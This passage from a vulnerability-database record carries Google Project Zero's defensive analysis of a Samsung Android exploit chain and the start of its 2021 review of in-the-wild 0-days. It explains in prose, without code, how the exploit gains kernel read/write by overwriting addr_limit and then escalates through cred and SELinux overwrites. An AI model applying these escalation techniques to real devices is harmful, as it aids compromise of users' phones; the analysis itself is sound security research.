pipe at [2].\n\nThe set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the bits provided in the mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit. \n\nNow that the addr_limit is set to KERNEL_DS the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit returns addr_limit back to USER_DS by reading the value from the pipe that was written at [2] and writing it back to the addr_limit. The exploit\u2019s function to read from kernel memory is the mirror image of this function.\n\nI deliberately am not calling this a bypass because UAO and PAN are acting exactly as they were designed to act: preventing the kernel from accessing user-space memory. UAO and PAN were not developed to protect against arbitrary write access to the addr_limit. \n\n## Post-exploitation\n\nThe exploit now has arbitrary kernel read and write. It then follows the steps as seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process\u2019s context to vold. vold is the \u201cVolume Daemon\u201d which is responsible for mounting and unmounting of external storage. vold runs as root and while it's a userspace service, it\u2019s considered kernel-equivalent as described in the [Android documentation on security contexts](<https://source.android.com/docs/security/overview/updates-resources#process_types>). Because it\u2019s a highly privileged security context, it makes a prime target for changing the SELinux context to.\n\n[![Screen shot of the "OS Kernel" section from https://source.android.com/docs/security/overview/updates-resources#process_types. It says: \u00a0Functionality that: - is part of the kernel - runs in the same CPU context as the kernel \$for example, device drivers\$ - has direct access to kernel memory \$for example, hardware components on the device\$ - has the capability to load scripts into a kernel component \$for example, eBPF\$ - is one of a handful of user services that's considered kernel equivalent \$such as, apexd, bpfloader, init, ueventd, and vold\$.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNmMRLkK2FzuHtZxYxOkwpwKjbotI2a0OrAKlIWHd24SXekvuwcem4iCOzsu3ssOq2eqwDeWZi9uaLjfh1oh8a1_foBtkvDt4qM-vqbT3wEp-dmVnv4DZHos2mtCe2nFBGe1ZmxDLOXdOuSyBu0_qRdxQvc0nfDltRu3IftdQ2rVH47dTN_qWAExff/s920/image5.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNmMRLkK2FzuHtZxYxOkwpwKjbotI2a0OrAKlIWHd24SXekvuwcem4iCOzsu3ssOq2eqwDeWZi9uaLjfh1oh8a1_foBtkvDt4qM-vqbT3wEp-dmVnv4DZHos2mtCe2nFBGe1ZmxDLOXdOuSyBu0_qRdxQvc0nfDltRu3IftdQ2rVH47dTN_qWAExff/s920/image5.png>)\n\nAs stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.\n\n# Conclusion\n\nThis in-the-wild exploit chain is a great example of different attack surfaces and \u201cshape\u201d than many of the Android exploits we\u2019ve seen in the past. All three vulnerabilities in this chain were in the manufacturer\u2019s custom components rather than in the AOSP platform or the Linux kernel. It\u2019s also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety. Of the [10 other Android in-the-wild 0-days](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1190662839>) that we\u2019ve tracked since mid-2014, only 2 of those were not memory corruption vulnerabilities.\n\nThe first vulnerability in this chain, the arbitrary file read and write, CVE-2021-25337, was the foundation of this chain, used 4 different times and used at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. The Java components in Android devices don\u2019t tend to be the most popular targets for security researchers despite it running at such a privileged level. This highlights an area for further research.\n\nLabeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know. \n\nThe analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different \u201cshapes\u201d and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we\u2019re at least 18 months behind the attackers: they already know which bugs they\u2019re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage. \n\nThis transparent disclosure of in-the-wild status is necessary for both the safety and autonomy of targeted users to protect themselves as well as the security industry to work together to best prevent these 0-days in the future.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-04T00:00:00", "type": "googleprojectzero", "title": "\nA Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215", "CVE-2021-25337", "CVE-2021-25369", "CVE-2021-25370"], "modified": "2022-11-04T00:00:00", "id": "GOOGLEPROJECTZERO:D2A52493D5CB16C438DD6D3C59FF3A66", "href": "https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-08-07T02:19:24", "description": "A Year in Review of 0-days Used In-the-Wild in 2021\n\nPosted by Maddie Stone, Google Project Zero\n\nThis is our third annual year in review of 0-days exploited in-the-wild [[2020](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>), [2019](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>)]. Each year we\u2019ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in the analysis of individual exploits, please check out our [root cause analysis repository](<https://googleprojectzero.blogspot.com/p/rca.html>).\n\nWe perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard [over](<https://forbiddenstories.org/about-the-pegasus-project/>) and [over](<https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/>) and [over](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>) about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans\u2019 lives.\n\nWe\u2019ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.\n\n# Executive Summary\n\n2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That\u2019s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We\u2019ve tracked publicly known in-the-wild 0-day exploits in [this spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) since mid-2014.\n\nWhile we often talk about the number of 0-day exploits used in-the-wild, what we\u2019re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.\n\nWith this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn\u2019t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero\u2019s mission is \u201cmake 0day hard\u201d. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.\n\nSo while we recognize the industry\u2019s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there\u2019s a lot more improving to be done. Having access to more \u201cground truth\u201d of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.\n\nWe had so many more data points in 2021 to learn about attacker behavior than we\u2019ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they\u2019re using or what percentage of 0-days we\u2019re missing in our tracking, so we\u2019ll never know exactly what proportion of 0-days are currently being found and disclosed publicly. \n\nBased on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:\n\n 1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.\n 2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.\n\n# A Record Year for In-the-Wild 0-days\n\n2021 was a record year for in-the-wild 0-days. So what happened?\n\n[![bar graph showing the number of in-the-wild 0-day detected per year from 2015-2021. The totals are taken from this tracking spreadsheet: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC72HVhQEdwHNIzMiyb18bUFr6hPCWJiKL2Mm43-tW11qc0ucOPI8A9oChEXQe0-QNOBF83SIcfyjcyvPveuWvgipbiBzHWqZTx2-LilJFYIbx6uQeno9f481HJQ0CgylQkh8Ks7AbGC6tjhYDNBcI7jh6ihhzJATA0r_P4bQUBm-1lmHp2DPvWM6I/s1200/image1%287%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC72HVhQEdwHNIzMiyb18bUFr6hPCWJiKL2Mm43-tW11qc0ucOPI8A9oChEXQe0-QNOBF83SIcfyjcyvPveuWvgipbiBzHWqZTx2-LilJFYIbx6uQeno9f481HJQ0CgylQkh8Ks7AbGC6tjhYDNBcI7jh6ihhzJATA0r_P4bQUBm-1lmHp2DPvWM6I/s1200/image1%287%29.png>)\n\nIs it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.\n\nWhile we often talk about \u201c0-day exploits used in-the-wild\u201d, what we\u2019re actually tracking are \u201c0-day exploits detected and disclosed as used in-the-wild\u201d. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry. \n\nOverall, we can break down the uptick in the number of in-the-wild 0-days into:\n\n * More detection of in-the-wild 0-day exploits\n * More public disclosure of in-the-wild 0-day exploitation\n\n## More detection\n\nIn the [2019 Year in Review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we wrote about the \u201cDetection Deficit\u201d. We stated \u201cAs a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\u201d In the last two years, we believe that there\u2019s been progress on this gap. \n\nAnecdotally, we hear from more people that they\u2019ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we\u2019re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.\n\n[![A bar graph showing the number of distinct reporters of 0-day in-the-wild vulnerabilities per year for 2019-2021. 2019: 9, 2020: 10, 2021: 20. The data is taken from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMbFpoEKSSn5AbAzsovaZ0yN6_OFXo9u4hpDCXJBpro8LRUWJlVQ9CSqtzT2V9ohrhOvP3_RnrYsOzFGPK0FZGJmW2713g2vVW82ReJVXpjAZc57BCxtHg8i-6AdR_ThDZB6UKvzAKekbmAkuUBliMyDyWSBW87z4ZZQJC3KX-_ptZIHveotLGoJ9I/s1200/image5%284%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMbFpoEKSSn5AbAzsovaZ0yN6_OFXo9u4hpDCXJBpro8LRUWJlVQ9CSqtzT2V9ohrhOvP3_RnrYsOzFGPK0FZGJmW2713g2vVW82ReJVXpjAZc57BCxtHg8i-6AdR_ThDZB6UKvzAKekbmAkuUBliMyDyWSBW87z4ZZQJC3KX-_ptZIHveotLGoJ9I/s1200/image5%284%29.png>)\n\n[![a line graph showing how many in-the-wild 0-days were found by their own vendor per year from 2015 to 2021. 2015: 0, 2016: 0, 2017: 2, 2018: 0, 2019: 4, 2020: 5, 2021: 17. Data comes from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRS0t_2Bwvc3U_EIr5h7NcWpQyjzHCPb4OMiDpzPxPs587otAEj8bzwch8UMFlgKchwdSq4L_PXRn1O6KGLHUl4X9voLBdZJNQsgQyJcMCVB4Y8-aRHaXRpOYZw7KVtyNYwdWpwX8ILUV1fyG2kDsXVWORsSPUBGVTON90gWf9POhhxA4edxNe1eoV/s1200/image2%285%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRS0t_2Bwvc3U_EIr5h7NcWpQyjzHCPb4OMiDpzPxPs587otAEj8bzwch8UMFlgKchwdSq4L_PXRn1O6KGLHUl4X9voLBdZJNQsgQyJcMCVB4Y8-aRHaXRpOYZw7KVtyNYwdWpwX8ILUV1fyG2kDsXVWORsSPUBGVTON90gWf9POhhxA4edxNe1eoV/s1200/image2%285%29.png>)\n\nWe\u2019ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it\u2019s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!\n\n## More disclosure\n\nThe second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate \u201cGoogle Android\u201d rather than just \u201cGoogle\u201d because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don\u2019t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by \u201cAnonymous\u201d reporters. If the reporters didn\u2019t want credit for the vulnerability, it\u2019s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn\u2019t have been included in this year\u2019s list if Apple and Google Android had not begun transparently annotating their security advisories. \n\n[![bar graph that shows the number of Android and Apple \$WebKit + iOS + macOS\$ in-the-wild 0-days per year. The bar graph is split into two color: yellow for Anonymously reported 0-days and green for non-anonymous reported 0-days. 2021 is the only year with any anonymously reported 0-days. 2015: 0, 2016: 3, 2018: 2, 2019: 1, 2020: 3, 2021: Non-Anonymous: 8, Anonymous- 12. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPe_J-0Wu9Ap-0n3Yj5BoXiWTnjViyyGasIChhb3juADZosK9nTbyiaWtzuRyjwG3frQNjLsvRMRoQHrFfo1iKa3GjmcuLHqat40GcoechQ16XbhpVGwF7m_TJ0Oucvy3wvm8x0aXbVnJfhkG2FNkxI4cJf5ONBqEYnPxQDUmZChvByLHE8OzSU20N/s1200/image3%287%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPe_J-0Wu9Ap-0n3Yj5BoXiWTnjViyyGasIChhb3juADZosK9nTbyiaWtzuRyjwG3frQNjLsvRMRoQHrFfo1iKa3GjmcuLHqat40GcoechQ16XbhpVGwF7m_TJ0Oucvy3wvm8x0aXbVnJfhkG2FNkxI4cJf5ONBqEYnPxQDUmZChvByLHE8OzSU20N/s1200/image3%287%29.png>)\n\nKudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for [CVE-2021-41773](<https://httpd.apache.org/security/vulnerabilities_24.html>) this past year. \n\nIn-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor\u2019s own security advisories.\n\nIt's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we\u2019re confident that all vendors are transparently disclosing in-the-wild status, there\u2019s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.\n\n# New Year, Old Techniques\n\nWe had a record number of \u201cdata points\u201d in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit \u201cshapes\u201d previously seen in public research. Once \u201c0-day is hard\u201d, we\u2019d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty \u201c[meh](<https://www.dictionary.com/browse/meh#:~:text=unimpressive%3B%20boring%3A>)\u201d or standard.\n\nOut of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it\u2019s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:\n\n * 17 use-after-free\n * 6 out-of-bounds read & write\n * 4 buffer overflow\n * 4 integer overflow\n\nIn the next sections we\u2019ll dive into each major platform that we saw in-the-wild 0-days for this year. We\u2019ll share the trends and explain why what we saw was pretty unexceptional.\n\n## Chromium (Chrome)\n\nChromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.\n\nThe 14 0-day vulnerabilities were in the following components:\n\n * 6 JavaScript Engine - v8 ([CVE-2021-21148](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>), [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>), [CVE-2021-37975](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-37975.html>), [CVE-2021-38003](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>))\n * 2 DOM Engine - Blink ([CVE-2021-21193](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) & [CVE-2021-21206](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>))\n * 1 WebGL ([CVE-2021-30554](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html>))\n * 1 IndexedDB ([CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>))\n * 1 webaudio ([CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>))\n * 1 Portals ([CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>))\n * 1 Android Intents ([CVE-2021-38000](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-38000.html>))\n * 1 Core ([CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>))\n\nWhen we look at the components targeted by these bugs, they\u2019re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.\n\nA couple of the Chromium bugs were even similar to previous in-the-wild 0-days. [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>) is an issue in ScriptProcessorNode::Process() in webaudio where there\u2019s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. [CVE-2019-13720](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-13720.html>) is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.\n\n[CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) is another Chromium in-the-wild 0-day from 2021. It\u2019s a type confusion in the TurboFan JIT in Chromium\u2019s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) in particular deals with code that stores global properties. [CVE-2020-16009](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-16009.html>) was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.\n\n## WebKit (Safari)\n\nPrior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don\u2019t have historical samples to go off of. Instead, we\u2019ll look at 2021\u2019s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days. \n\nThe 7 in-the-wild 0-days targeted the following components:\n\n * 4 Javascript Engine - JavaScript Core ([CVE-2021-1870](<https://support.apple.com/en-us/HT212146>), [CVE-2021-1871](<https://support.apple.com/en-us/HT212146>), [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>), [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>))\n * 1 IndexedDB ([CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>))\n * 1 Storage ([CVE-2021-30661](<https://support.apple.com/en-us/HT212317>))\n * 1 Plugins ([CVE-2021-1879](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1879.html>))\n\nThe one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021. \n\nIt would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there\u2019s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>), also existed in WebKit and was fixed as [CVE-2021-1844](<https://support.apple.com/en-us/HT212223>), though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, [CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>), was very, very similar to a [bug fixed in Chromium in January 2020](<https://bugs.chromium.org/p/chromium/issues/detail?id=1032890>).\n\n## Internet Explorer\n\nSince we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we\u2019ve ever tracked even though Internet Explorer\u2019s market share of web browser users continues to decrease.\n\n[![Bar graph showing the number of Internet Explorer itw 0-days discovered per year from 2015-2021. 2015: 3, 2016: 4, 2017: 3, 2018: 1, 2019: 3, 2020: 2, 2021: 4. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbMTlnGhVLcVL8K20S3s6hSrpyB6kZAA9CWvWNpn1isbEbLFv0c2rs_dPvM0ALT45NtTvyhp8rGehGDRIAEJ6OZYSkk5mezOEoPJOquVXXyHeqrVOvRGEiQHv_J7Je8Itjc5qhwXMCR-E4y79abuxiddCYoeF2VrVakY-L1q82NeMEPjTA0fFC-t8h/s1200/image4%286%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbMTlnGhVLcVL8K20S3s6hSrpyB6kZAA9CWvWNpn1isbEbLFv0c2rs_dPvM0ALT45NtTvyhp8rGehGDRIAEJ6OZYSkk5mezOEoPJOquVXXyHeqrVOvRGEiQHv_J7Je8Itjc5qhwXMCR-E4y79abuxiddCYoeF2VrVakY-L1q82NeMEPjTA0fFC-t8h/s1200/image4%286%29.png>)\n\nSo why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn\u2019t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we\u2019ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats. \n\nThe four 0-days targeted the following components:\n\n * MSHTML browser engine ([CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>), [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-33742.html>), [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>))\n * Javascript Engine - JScript9 ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>))\n\nFor [CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) and [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) were delivered to targets via malicious Office documents.\n\n[CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) and [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.\n\nThere were a few different vulnerabilities used in the exploit chain that used [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.\n\n## Windows\n\nWindows is the platform where we\u2019ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it\u2019s still not especially novel.\n\nIn 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:\n\n * 2 Enhanced crypto provider ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>), [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>))\n * 2 NTOS kernel ([CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>), [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>))\n * 2 Win32k ([CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>), [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>))\n * 1 Windows update 